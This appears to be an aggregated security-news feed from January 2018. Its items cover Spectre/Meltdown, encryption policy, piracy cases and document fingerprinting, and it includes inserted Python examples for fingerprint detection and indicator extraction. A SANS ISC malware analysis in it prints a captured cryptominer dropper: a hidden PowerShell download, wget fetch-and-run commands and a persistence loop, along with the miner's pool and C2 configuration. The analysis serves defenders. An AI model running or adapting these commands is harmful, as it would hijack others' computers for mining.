January 12, 2018
ISC Stormcast For Friday, January 12th 2018 https://isc.sans.edu/podcastdetail.html?id=5823, (Fri, Jan 12th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
January 11, 2018
Introducing Nextcloud Talk
Nextcloud has announced Nextcloud Talk, a fully open source video meeting software that is on-premise hosted and end-to-end encrypted. "Nextcloud Talk makes it easier than ever to host a privacy-respecting audio/video communication service for home users and enterprises. Business users have optional access to the Spreed High Performance Back-end offering enterprise-class scalability, reliability, and features through a Nextcloud subscription. With the easy-to-use interface, users can engage colleagues, friends, partners or customers, working in real time through High Definition (H265 based) audio and video in web meetings and webinars."
Fingerprinting Digital Documents
In this era of electronic leakers, remember that zero-width spaces and homoglyph substitution can fingerprint individual instances of files.
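As an added example (not code from the original post), the following shows how a per-copy identifier can be hidden in text with zero-width characters and recovered later, and how a reviewer can scan a document for zero-width or Cyrillic-homoglyph characters that may carry such a mark. The sample text, the recipient IDs and the small homoglyph table are constructed for illustration.

```python
"""Fingerprint a text with zero-width characters and detect such marks.

Added example, not from the original page. embed_id() hides a small
integer as a run of zero-width characters after the first word,
extract_id() recovers it, and find_marks() reports every zero-width or
Latin-lookalike Cyrillic character in a text: the scan a document
reviewer would run before publishing or forwarding a file.
"""
import unicodedata

ZW0 = "\u200b"   # ZERO WIDTH SPACE encodes a 0 bit
ZW1 = "\u200c"   # ZERO WIDTH NON-JOINER encodes a 1 bit
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}

# Constructed, deliberately short table: Latin letters that have a
# visually identical Cyrillic counterpart (a second fingerprinting channel).
HOMOGLYPHS = {"a": "\u0430", "e": "\u0435", "o": "\u043e", "p": "\u0440", "c": "\u0441"}


def embed_id(text, recipient_id, bits=16):
    """Hide recipient_id (0 <= id < 2**bits) as zero-width chars after the first word."""
    if not 0 <= recipient_id < (1 << bits):
        raise ValueError("id does not fit in %d bits" % bits)
    # Most significant bit first, one invisible character per bit.
    mark = "".join(ZW1 if (recipient_id >> i) & 1 else ZW0
                   for i in reversed(range(bits)))
    head, sep, tail = text.partition(" ")
    return head + mark + sep + tail


def extract_id(text, bits=16):
    """Recover the embedded id, or None if no complete mark is present."""
    stream = [c for c in text if c in (ZW0, ZW1)]
    if len(stream) < bits:
        return None
    return int("".join("1" if c == ZW1 else "0" for c in stream[:bits]), 2)


def find_marks(text):
    """Return (index, char, unicode name) for each zero-width or homoglyph char.

    A clean ASCII/Latin document yields an empty list; anything else is a
    candidate fingerprint (or a homoglyph-based spoofing attempt) worth a look.
    """
    suspicious = ZERO_WIDTH | set(HOMOGLYPHS.values())
    return [(i, ch, unicodedata.name(ch, "UNKNOWN"))
            for i, ch in enumerate(text) if ch in suspicious]


if __name__ == "__main__":
    # Constructed sample: two copies of one memo, each tagged for its recipient.
    memo = "Quarterly report for the board."
    for rid in (0x0001, 0xBEEF):
        copy = embed_id(memo, rid)
        print("recipient 0x%04X -> id recovered: 0x%04X, %d hidden chars"
              % (rid, extract_id(copy), len(find_marks(copy))))
    print("clean text marks:", find_marks(memo))
```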
Europol Hits Huge 500,000 Subscriber Pirate IPTV Operation
Live TV is in massive demand but accessing all content in a particular region can be a hugely expensive proposition, with traditional broadcasting monopolies demanding large subscription fees.
For millions around the world, this ‘problem’ can be easily circumvented. Pirate IPTV operations, which supply thousands of otherwise subscription channels via the Internet, are on the increase. They’re accessible for just a few dollars, euros, or pounds per month, slashing bills versus official providers on a grand scale.
This week, however, police forces around Europe coordinated to target what they claim is one of the world’s largest illicit IPTV operations. The investigation was launched last February by Europol and on Tuesday coordinated actions were carried out in Cyprus, Bulgaria, Greece, and the Netherlands.
Three suspects were arrested in Cyprus – two in Limassol (aged 43 and 44) and one in Larnaca (aged 53). All are alleged to be part of an international operation to illegally broadcast around 1,200 channels of pirated content worldwide. Some of the channels offered were illegally sourced from Sky UK, Bein Sports, Sky Italia, and Sky DE.
If initial reports are to be believed, the reach of the IPTV service was huge. Figures usually need to be taken with a pinch of salt but information suggests the service had more than 500,000 subscribers, each paying around 10 euros per month. (Note: how that relates to the alleged five million euros per year in revenue is yet to be made clear)
Police action was spread across the continent, with at least nine separate raids, including in the Netherlands where servers were uncovered. However, it was determined that these were in place to hide the true location of the operation’s main servers. Similar ‘front’ servers were also deployed in other regions.
The main servers behind the IPTV operation were located in Petrich, a small town in Blagoevgrad Province, southwestern Bulgaria. No details have been provided by the authorities but TF is informed that the website of a local ISP, Megabyte-Internet, from where pirate IPTV has been broadcast for at least the past several months, disappeared on Tuesday. It remains offline this morning.
The company did not respond to our request for comment and there’s no suggestion that it’s directly involved in any illegal activity. However, its Autonomous System (AS) number reveals linked IPTV services, none of which appear to be operational today. The ISP is also listed on sites where ‘pirate’ IPTV channel playlists are compiled by users.
According to sources in Cyprus, police requested permission from the Larnaca District Court to detain the arrested individuals for eight days. However, local news outlet Philenews said that any decision would be postponed until this morning, since one of the three suspects, an English Cypriot, required an interpreter which caused a delay.
In addition to prosecutors and defense lawyers, two Dutch investigators from Europol were present in court yesterday. The hearing lasted for six hours and was said to be so intensive that the court stenographer had to be replaced due to overwork.
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
Security updates for Thursday
Security updates have been issued by Arch Linux (glibc and lib32-glibc), Debian (ming and poco), Fedora (electron-cash, electrum, firefox, heketi, microcode_ctl, and python-jsonrpclib), openSUSE (clamav-database and ucode-intel), Red Hat (flash-plugin), SUSE (OBS toolchain), and Ubuntu (webkit2gtk).
Yet Another FBI Proposal for Insecure Communications
Deputy Attorney General Rosenstein has given talks where he proposes that tech companies decrease their communications and device security for the benefit of the FBI. In a recent talk, his idea is that tech companies just save a copy of the plaintext:
Law enforcement can also partner with private industry to address a problem we call "Going Dark." Technology increasingly frustrates traditional law enforcement efforts to collect evidence needed to protect public safety and solve crime. For example, many instant-messaging services now encrypt messages by default. They prevent the police from reading those messages, even if an impartial judge approves their interception.
The problem is especially critical because electronic evidence is necessary for both the investigation of a cyber incident and the prosecution of the perpetrator. If we cannot access data even with lawful process, we are unable to do our job. Our ability to secure systems and prosecute criminals depends on our ability to gather evidence.
I encourage you to carefully consider your company's interests and how you can work cooperatively with us. Although encryption can help secure your data, it may also prevent law enforcement agencies from protecting your data.
Encryption serves a valuable purpose. It is a foundational element of data security and essential to safeguarding data against cyber-attacks. It is critical to the growth and flourishing of the digital economy, and we support it. I support strong and responsible encryption.
I simply maintain that companies should retain the capability to provide the government unencrypted copies of communications and data stored on devices, when a court orders them to do so.
Responsible encryption is effective secure encryption, coupled with access capabilities. We know encryption can include safeguards. For example, there are systems that include central management of security keys and operating system updates; scanning of content, like your e-mails, for advertising purposes; simulcast of messages to multiple destinations at once; and key recovery when a user forgets the password to decrypt a laptop. No one calls any of those functions a "backdoor." In fact, those very capabilities are marketed and sought out.
I do not believe that the government should mandate a specific means of ensuring access. The government does not need to micromanage the engineering.
The question is whether to require a particular goal: When a court issues a search warrant or wiretap order to collect evidence of crime, the company should be able to help. The government does not need to hold the key.
Rosenstein is right that many services like Gmail naturally keep plaintext in the cloud. This is something we pointed out in our 2016 paper: "Don't Panic." But forcing companies to build an alternate means to access the plaintext that the user can't control is an enormous vulnerability.
Susan Landau's New Book: Listening In
Susan Landau has written a terrific book on cybersecurity threats and why we need strong crypto. Listening In: Cybersecurity in an Insecure Age. It's based in part on her 2016 Congressional testimony in the Apple/FBI case; it examines how the Digital Revolution has transformed society, and how law enforcement needs to -- and can -- adjust to the new realities. The book is accessible to techies and non-techies alike, and is strongly recommended.
And if you've already read it, give it a review on Amazon. Reviews sell books, and this one needs more of them.
Netflix, Amazon and Hollywood Sue Kodi-Powered Dragon Box Over Piracy
More and more people are starting to use Kodi-powered set-top boxes to stream video content to their TVs.
While Kodi itself is a neutral platform, sellers who ship devices with unauthorized add-ons give it a bad reputation.
In recent months these boxes have become the prime target for copyright enforcers, including the Alliance for Creativity and Entertainment (ACE), an anti-piracy partnership between Hollywood studios, Netflix, Amazon, and more than two dozen other companies.
After suing Tickbox last year a group of key ACE members have now filed a similar lawsuit against Dragon Media Inc, which sells the popular Dragon Box. The complaint, filed at a California federal court, also lists the company’s owner Paul Christoforo and reseller Jeff Williams among the defendants.
According to ACE, these types of devices are nothing more than pirate tools, allowing buyers to stream copyright infringing content. That also applies to Dragon Box, they inform the court.
“Defendants market and sell ‘Dragon Box,’ a computer hardware device that Defendants urge their customers to use as a tool for the mass infringement of the copyrighted motion pictures and television shows,” the complaint, picked up by HWR, reads.
The movie companies note that the defendants distribute and promote the Dragon Box as a pirate tool, using phrases such as “Watch your Favourites Anytime For FREE” and “stop paying for Netflix and Hulu.”
When users follow the instructions Dragon provides they get free access to copyrighted movies, TV-shows and live content, ACE alleges. The complaint further points out that the device uses the open source Kodi player paired with pirate addons.
“The Dragon Media application provides Defendants’ customers with a customized configuration of the Kodi media player and a curated selection of the most popular addons for accessing infringing content,” the movie companies write.
“These addons are designed and maintained for the overarching purpose of scouring the Internet for illegal sources of copyrighted content and returning links to that content. When Dragon Box customers click those links, those customers receive unauthorized streams of popular motion pictures and television shows.”
One of the addons that are included with the download and installation of the Dragon software is Covenant.
This addon can be accessed through a preinstalled shortcut which is linked under the “Videos” menu. Users are then able to browse through a large library of curated content, including a separate category of movies that are still in theaters.
According to a statement from Dragon owner Christoforo, business is going well. The company claims to have “over 250,000 customers in 50 states and 4 countries and growing” as well as “374 sellers” across the world.
With this lawsuit, however, the company’s future has suddenly become uncertain.
The movie companies ask the California District for an injunction to shut down the infringing service and impound all Dragon Box devices. In addition, they’re requesting statutory damages which can go up to several million dollars.
At the time of writing, the Dragon Box website is still on air and the company has yet to comment on the allegations.
—
A copy of the complaint is available here (pdf).
Spectre and Meltdown Attacks Against Microprocessors
The security of pretty much every computer on the planet has just gotten a lot worse, and the only real solution -- which of course is not a solution -- is to throw them all away and buy new ones.
On Wednesday, researchers just announced a series of major security vulnerabilities in the microprocessors at the heart of the world's computers for the past 15-20 years. They've been named Spectre and Meltdown, and they have to do with manipulating different ways processors optimize performance by rearranging the order of instructions or performing different instructions in parallel. An attacker who controls one process on a system can use the vulnerabilities to steal secrets elsewhere on the computer. (The research papers are here and here.)
This means that a malicious app on your phone could steal data from your other apps. Or a malicious program on your computer -- maybe one running in a browser window from that sketchy site you're visiting, or as a result of a phishing attack -- can steal data elsewhere on your machine. Cloud services, which often share machines amongst several customers, are especially vulnerable. This affects corporate applications running on cloud infrastructure, and end-user cloud applications like Google Drive. Someone can run a process in the cloud and steal data from every other user on the same hardware.
Information about these flaws has been secretly circulating amongst the major IT companies for months as they researched the ramifications and coordinated updates. The details were supposed to be released next week, but the story broke early and everyone is scrambling. By now all the major cloud vendors have patched their systems against the vulnerabilities that can be patched against.
"Throw it away and buy a new one" is ridiculous security advice, but it's what US-CERT recommends. It is also unworkable. The problem is that there isn't anything to buy that isn't vulnerable. Pretty much every major processor made in the past 20 years is vulnerable to some flavor of these vulnerabilities. Patching against Meltdown can degrade performance by almost a third. And there's no patch for Spectre; the microprocessors have to be redesigned to prevent the attack, and that will take years. (Here's a running list of who's patched what.)
This is bad, but expect it more and more. Several trends are converging in a way that makes our current system of patching security vulnerabilities harder to implement.
The first is that these vulnerabilities affect embedded computers in consumer devices. Unlike our computers and phones, these systems are designed and produced at a lower profit margin with less engineering expertise. There aren't security teams on call to write patches, and there often aren't mechanisms to push patches onto the devices. We're already seeing this with home routers, digital video recorders, and webcams. The vulnerability that allowed them to be taken over by the Mirai botnet last August simply can't be fixed.
The second is that some of the patches require updating the computer's firmware. This is much harder to walk consumers through, and is more likely to permanently brick the device if something goes wrong. It also requires more coordination. In November, Intel released a firmware update to fix a vulnerability in its Management Engine (ME): another flaw in its microprocessors. But it couldn't get that update directly to users; it had to work with the individual hardware companies, and some of them just weren't capable of getting the update to their customers.
We're already seeing this. Some patches require users to disable the computer's password, which means organizations can't automate the patch. Some antivirus software blocks the patch, or -- worse -- crashes the computer. This results in a three-step process: patch your antivirus software, patch your operating system, and then patch the computer's firmware.
The final reason is the nature of these vulnerabilities themselves. These aren't normal software vulnerabilities, where a patch fixes the problem and everyone can move on. These vulnerabilities are in the fundamentals of how the microprocessor operates.
It shouldn't be surprising that microprocessor designers have been building insecure hardware for 20 years. What's surprising is that it took 20 years to discover it. In their rush to make computers faster, they weren't thinking about security. They didn't have the expertise to find these vulnerabilities. And those who did were too busy finding normal software vulnerabilities to examine microprocessors. Security researchers are starting to look more closely at these systems, so expect to hear about more vulnerabilities along these lines.
Spectre and Meltdown are pretty catastrophic vulnerabilities, but they only affect the confidentiality of data. Now that they -- and the research into the Intel ME vulnerability -- have shown researchers where to look, more is coming -- and what they'll find will be worse than either Spectre or Meltdown. There will be vulnerabilities that will allow attackers to manipulate or delete data across processes, potentially fatal in the computers controlling our cars or implanted medical devices. These will be similarly impossible to fix, and the only strategy will be to throw our devices away and buy new ones.
This isn't to say you should immediately turn your computers and phones off and not use them for a few years. For the average user, this is just another attack method amongst many. All the major vendors are working on patches and workarounds for the attacks they can mitigate. All the normal security advice still applies: watch for phishing attacks, don't click on strange e-mail attachments, don't visit sketchy websites that might run malware on your browser, patch your systems regularly, and generally be careful on the Internet.
You probably won't notice that performance hit once Meltdown is patched, except maybe in backup programs and networking applications. Embedded systems that do only one task, like your programmable thermostat or the computer in your refrigerator, are unaffected. Small microprocessors that don't do all of the vulnerable fancy performance tricks are unaffected. Browsers will figure out how to mitigate this in software. Overall, the security of the average Internet-of-Things device is so bad that this attack is in the noise compared to the previously known risks.
It's a much bigger problem for cloud vendors; the performance hit will be expensive, but I expect that they'll figure out some clever way of detecting and blocking the attacks. All in all, as bad as Spectre and Meltdown are, I think we got lucky.
But more are coming, and they'll be worse. 2018 will be the year of microprocessor vulnerabilities, and it's going to be a wild ride.
Note: A shorter version of this essay previously appeared on CNN.com. My previous blog post on this topic contains additional links.
Mining or Nothing!, (Thu, Jan 11th)
Cryptocurrency mining has been a trending attack for a few weeks. Our idling CPUs are now targeted by bad guys who are looking to generate some extra revenue by abusing our resources. Other fellow handlers already posted diaries about this topic. Renato found a campaign based on a WebLogic exploit[1] and Jim detected a peak of activity on port 3333[2]. Yesterday, while reviewing alerts generated by my hunting scripts, I found an interesting snippet of code on Pastebin. Here is a copy of the script with some added comments (the lines starting with //):
```batch
@shift /0
@echo off
// No idea why a new service is created, there is no reference to this executable?
sc create MicrsoftFTP binPath= C:\ProgramData\svchost.exe start= auto
// Let's grab the miner
// Not very efficient because admin privileges are required to dump the file in this directory
powershell.exe -WindowStyle Hidden $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http://x.x.x.x:2114/drivers.exe', 'C:\Windows\drivers.exe')
ping 1.1.1.1 -n 10>nul 2>nul
set _task=drivers.exe
// Miner configuration
set _svr=C:\Windows\drivers.exe -o bom.dnstop[.]info:4555 -u 4BHZCKCaArVd84u …(removed)... bydit7sHgu4BAo5Rh -p x -k -B
set _des=start.bat
:checkstart
SET status=1
// Test if the miner is running
(TASKLIST|FIND /I "%_task%"||SET status=0) 2>nul 1>nul
ECHO %status%
// If not running, (re)start it or sleep
IF %status% EQU 1 (goto checkag ) ELSE (goto startsvr)
// Create the start.bat script and launch the miner
:startsvr
echo %time%
// Original strings were in Chinese
// Translation: "******** Program started ********"
echo ********??????********
// Translation: "The program restarts at% time%, check the system log"
echo ??????? %time% ,??????? >> restart_service.txt
echo start %_svr% > %_des%
echo exit >> %_des%
start %_des%
set/p=.<nul
for /L %%i in (1 1 10) do set /p a=.<nul&ping.exe /n 2 127.0.0.1>nul
echo .
echo Wscript.Sleep WScript.Arguments(0) >%tmp%\delay.vbs
cscript //b //nologo %tmp%\delay.vbs 10000
del %_des% /Q
// Translation: "******** Program completed ********"
echo ********??????********
goto checkstart
// Simple sleep function based on a VBS one-liner script
:checkag
// Translation: "% time% The program is running normally, and it will be checked after 10 seconds."
echo %time% ??????,10??????..
echo Wscript.Sleep WScript.Arguments(0) >%tmp%\delay.vbs
cscript //b //nologo %tmp%\delay.vbs 10000
goto checkstart
:begin
REM
```
The file referenced in the script (‘drivers.exe’) is not available anymore (HTTP 404 returned) but the server is running an HttpFileServer[3] instance which is very popular in China (I found plenty of them on Chinese servers).
You can see multiple files and installation scripts to deploy mining tools on Windows but also on Linux boxes. Example:
```sh
cd /tmp
wget -O xmrigDaemon http://x.x.x.x:2114/xmrigDaemon && chmod +x xmrigDaemon
wget -O xmrigMiner http://x.x.x.x:2114/xmrigMiner && chmod +x xmrigMiner
wget -O config.json http://x.x.x.x:2114/config.json && chmod +x config.json
chmod +x xmrigDaemon
chmod +x xmrigMiner
chmod +x config.json
./xmrigDaemon &
```
Even more interesting, the configuration is publicly available (config.json) and contains a lot of details about the attacker:
```json
{
    "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
    "av": 0,  // algorithm variation, 0 auto select
    "doublehash-thread-mask" : null,  // for av=2/4 only, limits doublehash to given threads (mask), mask "0x3" means run doublehash on thread 0 and 1 only (default: all threads)
    "background": true,  // true to run the miner in the background
    "colors": true,  // false to disable colored output
    "cpu-affinity": null,  // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "cpu-priority": null,  // set process priority (0 idle, 2 normal to 5 highest)
    "donate-level": 1,  // donate level, mininum 1%
    "log-file": null,  // log all output to a file, example: "c:/some/path/xmrig.log"
    "max-cpu-usage": 100,  // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
    "print-time": 60,  // print hashrate report every N seconds
    "retries": 5,  // number of times to retry before switch to backup server
    "retry-pause": 5,  // time to pause between retries
    "safe": false,  // true to safe adjust threads and av settings for current CPU
    "syslog": false,  // use system log for output messages
    "threads": null,  // number of miner threads
    "pools": [
        {
            "url": "bom.dnstop[.]info:2222",  // URL of mining server
            "user": "4BHZCKCaArVd84uydsakdzVHRtBJqG …(removed)… 3bBJJESH28YHbydit7sHgu4BAo5Rh",  // username for mining server
            "pass": "Lall …(removed)… ",  // password for mining server
            "keepalive": true,  // send keepalived for prevent timeout (need pool support)
            "nicehash": false  // enable nicehash/xmrig-proxy support
        }
    ],
    "api": {
        "port": 0,  // port for the miner API https://github.com/xmrig/xmrig/wiki/API
        "access-token": null,  // access token for API
        "worker-id": null  // custom worker-id for API
    },
    "cc-client": {
        "url": "bom.dnstop.info:3324",  // url of the CC Server (ip:port)
        "access-token": "mySecret",  // access token for CC Server (has to be the same in config_cc.json)
        "worker-id": null,  // custom worker-id for CC Server (otherwise hostname is used)
        "update-interval-s": 10  // status update interval in seconds (default: 10 min: 1)
    }
}
```
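An xmrig config of this kind is useful for blocking and hunting, but its // comments make json.loads() reject it. The following added example (not part of the diary) strips the comments without touching "//" inside strings, loads the file, and pulls out the pool and CC endpoints, wallet and CC token a defender would feed to blocklists and detection rules; the embedded config is a constructed sample in the same layout as the captured one, with placeholder hosts and wallet.

```python
"""Extract network indicators from an xmrig-style config.json.

Added example, not from the diary. The sample below is constructed to
mirror the structure of the captured config.json; its hosts and wallet
are placeholders, not the real indicators.
"""
import json

SAMPLE_CONFIG = '''{
    "algo": "cryptonight",      // cryptonight (default) or cryptonight-lite
    "background": true,         // true to run the miner in the background
    "donate-level": 1,          // donate level, minimum 1%
    "log-file": null,           // example: "c:/some/path/xmrig.log"
    "pools": [
        {
            "url": "pool.example[.]invalid:2222",   // URL of mining server (defanged)
            "user": "4B_PLACEHOLDER_WALLET",        // username for mining server
            "pass": "x",                            // password for mining server
            "keepalive": true,
            "nicehash": false
        }
    ],
    "api": {
        "port": 0,              // port for the miner API https://github.com/xmrig/xmrig/wiki/API
        "access-token": null
    },
    "cc-client": {
        "url": "cc.example.invalid:3324",   // url of the CC Server (ip:port)
        "access-token": "mySecret",
        "update-interval-s": 10
    }
}'''


def strip_line_comments(text):
    """Remove // comments while leaving '//' inside JSON strings untouched."""
    out = []
    in_string = False
    i = 0
    while i < len(text):
        ch = text[i]
        if in_string:
            out.append(ch)
            if ch == "\\" and i + 1 < len(text):   # copy escaped char verbatim
                out.append(text[i + 1])
                i += 1
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
            out.append(ch)
        elif text.startswith("//", i):
            nl = text.find("\n", i)                # drop up to, not including, the newline
            i = len(text) if nl == -1 else nl
            continue
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def load_xmrig_config(text):
    """Parse a commented xmrig config into a dict."""
    return json.loads(strip_line_comments(text))


def refang(host):
    """Turn a defanged 'host[.]tld:port' back into a usable indicator."""
    return host.replace("[.]", ".")


def extract_indicators(cfg):
    """Return endpoints to block plus wallet(s) and CC token to hunt for."""
    pools = cfg.get("pools", [])
    endpoints = {refang(p["url"]) for p in pools if p.get("url")}
    wallets = sorted({p["user"] for p in pools if p.get("user")})
    cc = cfg.get("cc-client", {})
    cc_url = refang(cc["url"]) if cc.get("url") else None
    if cc_url:
        endpoints.add(cc_url)
    return {"endpoints": sorted(endpoints), "wallets": wallets,
            "cc_url": cc_url, "cc_token": cc.get("access-token")}


if __name__ == "__main__":
    ind = extract_indicators(load_xmrig_config(SAMPLE_CONFIG))
    for key, value in ind.items():
        print("%-9s %s" % (key, value))
```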
Here is a table with file details:
| Name | MD5 | Type | VT Score |
|---|---|---|---|
| discuz | 588dcdd23deb25d99b0924ef96e4681f | ELF 32bits | Unknown |
| discuz.exe | 08855aa283b692347bcabb48d6f8bcdf | PE32 | 52/68 |
| lpost.exe | 6a33d25fa28fd865a5e2fa43250e64dd | PE32 | 51/68 |
| master.exe | b5cc55f84c0d4f4b86f76956f94b170d | PE32 | 42/68 |
| ss1s.exe | bb2d8d8c8087073d83a7226c4a44296b | PE32 | 15/67 |
| svchost.exe | 6a33d25fa28fd865a5e2fa43250e64dd | PE32 | 51/68 |
| xmrigDaemon | 7dc04d39f2786eceab4fbf2cf16eded6 | ELF 32bits | Unknown |
| xmrigDaemon-2 | 710f2be21798478cc2f534ee2eb7b800 | ELF 64bits | 1/60 |
| xmrigMiner | b87982f5f938b2a7c9852a5de63bbc68 | ELF 32bits | Unknown |
| xmrigMiner-2 | f8cb16918b42505abe547da37b9614a9 | ELF 64bits | 14/60 |
[1] https://isc.sans.edu/forums/diary/Campaign+is+using+a+recently+released+WebLogic+exploit+to+deploy+a+Monero+miner/23191/
[2] https://isc.sans.edu/forums/diary/What+is+going+on+with+port+3333/23215/
[3] http://rejetto.com/hfs/
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
ISC Stormcast For Thursday, January 11th 2018 https://isc.sans.edu/podcastdetail.html?id=5821, (Thu, Jan 11th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
[$] LWN.net Weekly Edition for January 11, 2018
The LWN.net Weekly Edition for January 11, 2018 is available.
January 10, 2018
[$] Eelo seeks to make a privacy-focused phone
A focus on privacy is a key feature being touted by a number of different projects these days—from KDE to Tails to Nextcloud. One of the biggest privacy leaks for most people is their phone, so it is no surprise that there are projects looking to address that as well. A new entrant in that category is eelo, which is a non-profit project aimed at producing not only a phone, but also a suite of web services. All of that could potentially replace the Google or Apple mothership, which tend to collect as much personal data as possible.
Judge Issues Devastating Order Against BitTorrent Copyright Troll
In recent years, file-sharers around the world have been pressured to pay significant settlement fees, or face legal repercussions.
These so-called “copyright trolling” efforts have been a common occurrence in the United States since the turn of the last decade.
Increasingly, however, courts are growing weary of these cases. Many districts have turned into no-go zones for copyright trolls and the people behind Prenda law were arrested and are being prosecuted in a criminal case.
In the Western District of Washington, the tide also appears to have turned. After Venice PI, a copyright holder of the film “Once Upon a Time in Venice”, sued a man who later passed away, concerns were raised over the validity of the evidence.
Venice PI responded to the concerns with a declaration explaining its data gathering technique and assuring the Court that false positives are out of the question.
That testimony didn’t help much though, as a recently filed minute order shows this week. The order applies to a dozen cases and prohibits the company from reaching out to any defendants until further notice, as there are several alarming issues that have to be resolved first.
One of the problems is that Venice PI declared that it’s owned by a company named Lost Dog Productions, which in turn is owned by Voltage Productions. Interestingly, these companies don’t appear in the usual records.
“A search of the California Secretary of State’s online database, however, reveals no registered entity with the name ‘Lost Dog’ or ‘Lost Dog Productions’,” the Court notes.
“Moreover, although ‘Voltage Pictures, LLC’ is registered with the California Secretary of State, and has the same address as Venice PI, LLC, the parent company named in plaintiff’s corporate disclosure form, ‘Voltage Productions, LLC,’ cannot be found in the California Secretary of State’s online database and does not appear to exist.”
In other words, the company that filed the lawsuit, as well as its parent company, are extremely questionable.
While the above is a reason for concern, it’s just the tip of the iceberg. The Court not only points out administrative errors, but it also has serious doubts about the evidence collection process. This was carried out by the German company MaverickEye, which used the tracking technology of another German company, GuardaLey.
GuardaLey CEO Benjamin Perino, who claims that he coded the tracking software, wrote a declaration explaining that the infringement detection system at issue “cannot yield a false positive.” However, the Court doubts this statement and Perino’s qualifications in general.
“Perino has been proffered as an expert, but his qualifications consist of a technical high school education and work experience unrelated to the peer-to-peer file-sharing technology known as BitTorrent,” the Court writes.
“Perino does not have the qualifications necessary to be considered an expert in the field in question, and his opinion that the surveillance program is incapable of error is both contrary to common sense and inconsistent with plaintiff’s counsel’s conduct in other matters in this district. Plaintiff has not submitted an adequate offer of proof”
It seems like the Court would prefer to see an assessment from a qualified independent expert instead of the person who wrote the software. For now, this means that the IP-address evidence, in these cases, is not good enough. That’s quite a blow for the copyright holder.
If that wasn’t enough the Court also highlights another issue that’s possibly even more problematic. When Venice PI requested the subpoenas to identify alleged pirates, they relied on declarations from Daniel Arheidt, a consultant for MaverickEye.
These declarations fail to mention, however, whether MaverickEye has the proper paperwork to collect IP addresses.
“Nowhere in Arheidt’s declarations does he indicate that either he or MaverickEye is licensed in Washington to conduct private investigation work,” the order reads.
This is important, as doing private investigator work without a license is a gross misdemeanor in Washington. The copyright holder was aware of this requirement because it was brought up in related cases in the past.
“Plaintiff’s counsel has apparently been aware since October 2016, when he received a letter concerning LHF Productions, Inc. v. Collins, C16-1017 RSM, that Arheidt might be committing a crime by engaging in unlicensed surveillance of Washington citizens, but he did not disclose this fact to the Court.”
The order is very bad news for Venice PI. The company had hoped to score a few dozen easy settlements but the tables have now been turned. The Court instead asks the company to explain the deficiencies and provide additional details. In the meantime, the copyright holder is urged not to spend or transfer any of the settlement money that has been collected thus far.
The latter indicates that Venice PI might have to hand defendants their money back, which would be pretty unique.
The order suggests that the Judge is very suspicious of these trolling activities. In a footnote there’s a link to a Fight Copyright Trolls article which revealed that the same counsel dismissed several cases, allegedly to avoid having IP-address evidence scrutinized.
Even more bizarrely, in another footnote the Court also doubts if MaverickEye’s aforementioned consultant, Daniel Arheidt, actually exists.
“The Court has recently become aware that Arheidt is the latest in a series of German declarants (Darren M. Griffin, Daniel Macek, Daniel Susac, Tobias Fieser, Michael Patzer) who might be aliases or even fictitious.
“Plaintiff will not be permitted to rely on Arheidt’s declarations or underlying data without explaining to the Court’s satisfaction Arheidt’s relationship to the above-listed declarants and producing proof beyond a reasonable doubt of Arheidt’s existence,” the court adds.
These are serious allegations, to say the least.
If a copyright holder uses non-existent companies and questionable testimony from unqualified experts after obtaining evidence illegally to get a subpoena backed by a fictitious person….something’s not quite right.
—
A copy of the minute order, which affects a series of cases, is available here (pdf).
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
A tribute to James Dolan, co-creator of SecureDrop Freedom of the Press Foundation has a tribute to James Dolan, who died over the holidays at the age of 36. James worked with Aaron Swartz and journalist Kevin Poulsen to build the original prototype of SecureDrop, an open-source whistleblower submission system. "He was our first full-time employee at Freedom of the Press Foundation, and quickly set out to teach other developers, contributors, and anyone interested in how the system worked. He poured his heart and soul into the work, traveling to newsrooms around North America to teach IT staffs and journalists in person how to install and use SecureDrop. He completely reworked the installation process, he pushed us to get independent security audits of the system, and he helped us hire the initial team that would take over SecureDrop once he was gone." LWN covered a LibrePlanet talk on SecureDrop back in March 2017. (Thanks to Paul Wise)
Stable kernel updates Greg Kroah-Hartman has released stable kernels 4.14.13, 4.9.76, and 4.4.111. As usual, they all contain important fixes and users should update.
Security updates for Wednesday Security updates have been issued by Debian (awstats, gdk-pixbuf, plexus-utils, and plexus-utils2), Fedora (asterisk, gimp, heimdal, libexif, linux-firmware, mupdf, poppler, thunderbird, webkitgtk4, wireshark, and xrdp), openSUSE (diffoscope, irssi, and qemu), SUSE (java-1_7_0-ibm, kernel-firmware, and qemu), and Ubuntu (irssi, kernel, linux, linux-aws, linux-euclid, linux-kvm, linux-hwe, linux-azure, linux-gcp, linux-oem, linux-lts-trusty, linux-lts-xenial, linux-lts-xenial, linux-aws, linux-raspi2, ruby1.9.1, ruby2.3, and sssd).
Detecting Adblocker Blockers
Interesting research on the prevalence of adblock blockers: "Measuring and Disrupting Anti-Adblockers Using Differential Execution Analysis":
Abstract: Millions of people use adblockers to remove intrusive and malicious ads as well as protect themselves against tracking and pervasive surveillance. Online publishers consider adblockers a major threat to the ad-powered "free" Web. They have started to retaliate against adblockers by employing anti-adblockers which can detect and stop adblock users. To counter this retaliation, adblockers in turn try to detect and filter anti-adblocking scripts. This back and forth has prompted an escalating arms race between adblockers and anti-adblockers.
